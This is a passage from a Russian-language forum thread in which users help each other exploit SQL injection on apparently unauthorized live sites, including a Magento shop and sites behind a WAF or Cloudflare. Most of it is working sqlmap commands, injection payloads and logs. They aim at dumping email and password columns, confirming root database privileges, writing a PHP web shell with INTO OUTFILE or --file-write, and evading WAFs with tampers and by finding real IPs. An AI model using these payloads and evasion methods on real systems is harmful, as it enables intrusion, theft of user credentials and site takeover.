Подскажите, пожалуйста, отсканировал сайт Acunetix, нашел sql уязвимость, но sqlmap не может пробить ее, думаю из-за WAF. Как понять, какой tamper использовать, или же как вытащить необходимую информацию для sqlmap из Acunetix?
Это не много не так работает. Сначала необходимо раскрутить уязвимость самому, а потом автоматизировать процесс средствами sqlmap. Соответственно, что бы понять какой тампер использовать - раскрути сначала руками.
Пытаюсь сдампить данные и вот уже почти час у меня вот такое: [INFO] fetching entries of column(s) 'email,passwort' for table.... Без каких либо движений. Может быть такое,что sqlmap долго считает колличество строк,если база большая?
sql на магенто /result/?q=1' Акунетикс нашел sql даже выдернур имя БД Code: Proof of Exploit SQL query - SELECT database() admin8sasdasd При отправке через бурп site/result/?q=1' Ответ: Code: HTTP/1.1 503 Service Unavailable <pre>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1<br /> <strong>Trace:</strong> <p>Error log record number: <address class="copyright">Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.</address> Но при попытки крутануть мапом! Не видит скулю( Пробывал --text-only Может какой темпер есть под магенто?
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user Code: [INFO] retrieved: 'root@localhost' sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php >>Не льет, хотя права есть sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell select user() Code: [INFO] retrieved: 'root@localhost' select 'test' into outfile '/var/www/test.txt' Code: [WARNING] execution of non-query SQL statements is only available when stacked queries are supported Что можно попробовать? Или в error-based inj не выполняется into outfile ? load_file работает
Привилегии типа FILE != правам на запись в директорию + вы не показали привилегии юзера, root@localhost не обязательно рутовый пользователь мускула, но я думаю вы это знаете. По идее должен, так как юнион, еррор и тд различаются по способу получения инфы, т.е. один и тот же запрос может быть и union и error и time-based и blind и stack queries, правда это относится не ко всем запросам и субд. Правда мне не совсем понятно, почему отработал первый запрос, но ошибка на второй, ну да ладно. + В вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор.
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU Code: [23:12:06] [INFO] fetching current user [23:12:07] [INFO] retrieved: 'root@localhost' [*] 'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE @@secure_file_priv Code: sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;" [23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv' [23:18:45] [INFO] resumed: ' ' select @@secure_file_priv: ' ' --technique=E Code: sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E [23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported --technique=B Code: sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B [23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported С правами все нормально, не могу понять только почему не выполняется into outfile
ну для начала стоит поставить точку с запятой в последние запросы)) хотя мб в склмап это не нужно, давно не юзал. + https://github.com/sqlmapproject/sqlmap/issues/619 Вообще ошибка на stacked queries, а в мускуле таких инъекций нет, не знаю, я бы включил verbose на максимум, попробовал руками. Больше, наверное, ничем не смогу помочь.
Тогда уже тут я бессылен. Либо нужно идти в другую тему или забить) SELECT user(); qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc Code: General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq' SELECT 123 INTO OUTFILE '/tmp/test.txt'; qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP Code: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1 qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr Code: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1 qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- - Code: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
IIS/dbms:mssql boolean-based blind/error-based 1. при technique=B --is-dba=true при technique=E --is-dba=false. почему? 2. при выводе таблиц (technique=E) [WARNING] the SQL query provided does not return any output(с выводом бд все норм) common-tables выручает, но так как сайт самопис находит только 5 таблиц. как заставить скульмап вывести таблицы ? Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT) Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (8607=8607 Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') --- [INFO] fetching tables for database: db1 [PAYLOAD] -1789 [PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects.name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (2349=2349 [WARNING] the SQL query provided does not return any output
С клаудом туго, в открытом доступе тамперов под него нету. Как вариант искать реальный ИП ,что не всегда у получается
Code: Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://' AND 7389=7389-- qoxM Vector: AND [INFERENCE] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://' AND (SELECT 9965 FRO M (SELECT(SLEEP(5)))umCy)-- CigK Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE] ,0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL ,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372 674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- - Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- - --- [06:15:30] [INFO] testing MySQL [06:15:30] [DEBUG] performed 0 queries in 0.02 seconds [06:15:30] [INFO] confirming MySQL [06:15:30] [DEBUG] performed 0 queries in 0.00 seconds [06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70 7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707 1)-- - [06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting [06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70 7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707 1)-- - [06:15:34] [DEBUG] performed 2 queries in 4.32 seconds [06:15:34] [DEBUG] performed 0 queries in 0.01 seconds [06:15:34] [INFO] the back-end DBMS is MySQL web application technology: Nginx back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [06:15:34] [INFO] fetching tables for database: 'DB' [06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70 7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- - [06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70 7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION _SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- - [06:15:40] [WARNING] the SQL query provided does not return any output [06:15:40] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' [06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70 7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- - [06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70 7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod b_table_stats WHERE database_name IN (0x70617266756d)-- - [06:15:45] [WARNING] the SQL query provided does not return any output [06:15:45] [INFO] fetching number of tables for database 'DB' [06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d), 1,1))>51-- ZVRv [06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d), 1,1))>48-- ZVRv [06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d), 1,1))>9-- ZVRv [06:15:52] [INFO] retrieved: [06:15:52] [DEBUG] performed 3 queries in 6.77 seconds multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N [06:15:52] [DEBUG] used the default behavior, running in batch mode [06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID(( SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA [06:15:52] [WARNING] time-based comparison requires larger statistical model, pl ease wait..................... (done) [06:16:00] [CRITICAL] considerable lagging has been detected in connection respo nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID(( SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA [06:16:01] [WARNING] it is very important to not stress the network connection d uring usage of time-based payloads to prevent potential disruptions [06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID(( SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA [06:16:03] [INFO] retrieved: [06:16:03] [DEBUG] performed 3 queries in 11.19 seconds [06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu m' [06:16:03] [INFO] fetching number of tables for database 'DB' [06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d), 1,1))>51-- LERK [06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d), 1,1))>48-- LERK [06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu rposes) [06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d), 1,1))>9-- LERK [06:16:07] [INFO] retrieved: [06:16:07] [DEBUG] performed 3 queries in 3.66 seconds [06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID(( SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj [06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID(( SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj [06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID(( SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj [06:16:10] [INFO] retrieved: [06:16:10] [DEBUG] performed 3 queries in 3.23 seconds [06:16:10] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] N [06:16:10] [DEBUG] used the default behavior, running in batch mode No tables found
Code: [06:15:40] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри
можно использовать сразу связку из нескольких тамперов + используй --prefix="111'/*!40222" --suffix="*/!'" если не помогает, то определи какая waf и попробуй найти как вариант реальный ip сайта если и это не выходит то придется вручную писать тампер
[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is drop ping 'suspicious' requests Как можно обойти? [08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:06:18] [CRITICAL] connection timed out to the target URL [08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:08:19] [CRITICAL] connection timed out to the target URL [08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WH ERE or HAVING clause (NOT)' injectable (with --string="write") [08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retriev al [08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a fa lse positive [08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:10:19] [CRITICAL] connection timed out to the target URL [08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [08:12:19] [CRITICAL] connection timed out to the target URL [08:12:19] [WARNING] false positive or unexploitable injection point detected [08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable ваф не дает прокрутить скулю
Доброго дня! К примеру знаю что в БД есть строка с почтой [email protected], но имя таблицы и колонки не знаю т.к. они имеют рандомные названия типа "dfdwydponefdxb". Как выполнить поиск по всей БД и найти в какой таблице есть запись с [email protected]?
